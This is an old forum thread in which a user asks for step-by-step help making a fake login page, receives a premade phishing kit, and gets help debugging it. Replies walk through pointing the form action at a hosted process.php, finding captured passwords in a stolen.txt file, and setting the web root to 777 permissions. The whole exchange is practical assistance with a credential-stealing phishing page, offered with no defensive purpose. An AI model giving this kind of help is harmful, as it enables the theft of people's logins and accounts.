Hi im new to the site and was wondering if anyone can help me step by step in creating a fake login page.
Hi im new to the site and was wondering if anyone can help me step by step in creating a fake login page.
Last edited by lonegunner46; 05-29-2007 at 07:29 PM. Reason: typo
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A premade one, here you go, courtesy of mike*5*
i am not interseted in a premade one but thank you anyways;I want to learn how to make them and host them. But still thank you though
Well, go to this site:
[url]http://www.w*schools.com/[/url]
They have great tutorials on web languages. The ones you will need to learn are HTML and PHP.
ha ha actually i am interested in using mike*5*'s files how might i implement them?
thank you for the help I really appreciate it.
uh oh when I look at the stolen.txt nothing comes up and I already inputed my email address and password in the index.html. Where are the passwords supposed to be?
Last edited by lonegunner46; 05-30-2007 at 07:59 PM.
Have you chmoded the files?
yes i haved chmoded all the files
Did you edit the index page? If so, what did you edit the action to?
<form action="http://www.anwarkhan.t*5.com/process.php" method="post" name="theForm" id="theForm">
<input type="hidden" name="Login" id="Login" value="" />
thats what the form action is.
Did you even upload it? I went to the URL and it wasn't there.
I included all the instructions in the readme, and both I and Moonbat got it working using those. Try reading them again.
I suspect you didn't set the permissions of the root directory to 777. That's the directory containing all the files of your entire website; usually names htdocs or public_html if you've got a proper unix account. See the place where you uploaded process.php, then you could access it via [url]http://www.anwarkhan.t*5.com/process.php?[/url] In your FTP program (or web file manager), go one level higher, then set the permissions of the root directory.
Note that for the moment directories are not chmodded recursively -- subdirectories and files will remain unaffected. In the future, recursive chmodding will be added to net2ftp.
does this have to do with anything?